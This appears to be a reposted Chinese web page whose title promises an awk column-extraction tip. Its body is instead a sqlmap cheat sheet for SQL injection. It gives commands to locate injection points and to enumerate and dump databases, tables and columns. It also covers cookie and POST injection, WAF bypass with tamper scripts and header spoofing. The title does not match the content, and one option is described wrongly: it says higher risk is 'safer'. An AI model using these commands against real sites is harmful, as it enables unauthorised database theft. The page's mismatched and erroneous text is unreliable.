linux中awk命令提取連續列
阿新 • • 發佈:2022-03-23
一般的資料庫注入步驟:
1. sqlmap -u "http://www.xx.com?id=x" 【查詢是否存在注入點 2. --dbs 【檢測站點包含哪些資料庫 3. --current-db 【獲取當前的資料庫名 4. --tables -D "db_name" 【獲取指定資料庫中的表名 -D後接指定的資料庫名稱 5. --columns -T "table_name" -D "db_name" 【獲取資料庫表中的欄位 6. --dump -C "columns_name" -T "table_name" -D "db_name" 【獲取欄位的資料內容
Cookie注入:
sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2 【cookie注入 後接cookie值
POST注入:
(1)目標地址http:// www.xxx.com /login.asp (2)開啟brup代理。 (3)點選表單提交 (4)burp獲取攔截資訊(post) (5)右鍵儲存檔案(.txt)到指定目錄下 (6)執行sqlmap並執行如下命令: 用例:sqlmap -r okay.txt -p username -r表示載入檔案(及步驟(5)儲存的路徑),-p指定引數(即攔截的post請求中表單提交的使用者名稱或密碼等name引數) (7)自動獲取表單:--forms自動獲取表單 例如:sqlmap -u www.xx.com/login.asp --forms (8)指定引數搜尋:--data 例如:sqlmap -u www.xx.com/login.asp --data "username=1"
SQLMAP常用的命令:
1. --purge 【重新掃描(--purge 刪除原先對該目標掃描的記錄) 2. --tables 【獲取表名 3. --dbs 【檢測站點包含哪些資料庫 4. --current-db 【獲取當前的資料庫名5. --current-user 【檢測當前使用者 6. --is-dba 【判斷站點的當前使用者是否為資料庫管理員 7. --batch 【預設確認,不詢問你是否輸入 8. --search 【後面跟引數 -D -T -C 搜尋列(C),表(T)和或資料庫名稱(D) 9. --threads 10 【執行緒,sqlmap執行緒最高設定為10 10. --level 3 【sqlmap預設測試所有的GET和POST引數,當--level的值大於等於2的時候也會測試HTTP Cookie頭 的值,當大於等於3的時候也會測試User-Agent和HTTP Referer頭的值。最高為5 11. --risk 3 【執行測試的風險(0-3,預設為1)risk越高,越慢但是越安全 12. -v 【詳細的等級(0-6) 0:只顯示Python的回溯,錯誤和關鍵訊息。 1:顯示資訊和警告訊息。 2:顯示除錯訊息。 3:有效載荷注入。 4:顯示HTTP請求。 5:顯示HTTP響應頭。 6:顯示HTTP響應頁面的內容 13. --privileges 【檢視許可權 14. --tamper xx.py,cc.py 【防火牆繞過,後接tamper庫中的py檔案 15. --method "POST" --data "page=1&id=2" 【POST方式提交資料 16. --threads number 【採用多執行緒 後接執行緒數 17. --referer "" 【使用referer欺騙 18. --user-agent "" 【自定義user-agent 19. --proxy “目標地址″ 【使用代理注入
Kali系統整合的SQLMAP工具目錄:
sqlmap常用路徑:
1. 新增表字段的目錄在sqlmap/txt/common-tables.txt
2. 存放掃描記錄的目錄在sqlmap/output